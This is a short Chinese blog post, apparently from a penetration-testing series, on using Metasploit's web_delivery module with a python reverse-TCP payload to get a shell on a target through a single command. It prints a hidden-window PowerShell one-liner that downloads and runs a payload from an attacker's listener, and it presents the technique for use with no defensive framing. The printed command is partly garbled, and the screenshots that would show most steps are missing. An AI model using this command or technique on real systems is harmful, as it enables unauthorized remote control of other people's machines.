内网渗透十:MSF:web_delivery模块

前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。

目标环境:

ubuntu 16.0.4

1、选择exploit/multi/script/web_delivery模块

2、选择目标系统,我这里选择Linux(windows  可以选择PSH  pollowshell)

linux:

windows:

3、选择payload,

linux:

payload/python/shell_reverse_tcp

 winodws:

4、本机监听一下

5、运行,生成一条命令

linux:

windows:

6、目标机器执行上线。

linux:

 

windows:

可以看到我们接收到一串字符串如下:

powershell.exe -nop -w hidden -c M = n e w − o b j e c t n e t . w e b c l i e n t ; M=new-object net.webclient; M=new−objectnet.webclient;M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring(‘http://192.168.0.104:8080/’);

我们只需要把这串字符串在windows环境下cmd中执行就可以了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值